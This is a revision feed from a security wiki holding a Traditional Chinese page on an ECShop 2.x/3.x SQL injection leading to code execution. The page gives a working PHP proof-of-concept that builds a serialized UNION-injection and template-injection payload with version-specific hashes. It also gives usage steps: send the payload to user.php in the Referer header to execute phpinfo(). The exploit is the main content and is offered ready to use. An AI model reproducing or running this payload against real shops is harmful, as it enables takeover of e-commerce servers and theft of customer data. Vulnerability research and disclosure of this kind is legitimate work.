https://pwnwiki.com/index.php?action=history&feed=atom&title=ECShop_SQL%E6%B3%A8%E5%85%A5%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-hant
ECShop SQL注入任意代碼執行漏洞/zh-hant - Revision history
2026-04-08T05:01:32Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=ECShop_SQL%E6%B3%A8%E5%85%A5%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-hant&diff=3430&oldid=prev
Pwnwiki: Created page with "訪問"
2021-05-26T13:25:29Z
<p>Created page with "訪問"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==影響版本==<br />
<pre><br />
Ecshop 2.x <br />
Ecshop 3.x-3.6.0<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
<?php <br />
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");<br />
$id = "-1' UNION/*";<br />
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);<br />
$arr = array();<br />
$arr["num"]=$test;<br />
$arr["id"]=$id;<br />
<br />
$s = serialize($arr);<br />
<br />
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';<br />
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';<br />
<br />
echo "POC for ECShop 2.x: \n";<br />
echo "{$hash2}ads|{$s}{$hash2}";<br />
echo "\n\nPOC for ECShop 3.x: \n";<br />
echo "{$hash3}ads|{$s}{$hash3}";<br />
<br />
?><br />
</pre><br />
<br />
<br />
==漏洞利用==<br />
<br />
<br />
訪問<br />
<pre><br />
http://127.0.0.1/user.php<br />
</pre><br />
<br />
添加referer請求頭,將poc放入再請求,可以看到執行了phpinfo()</div>
Pwnwiki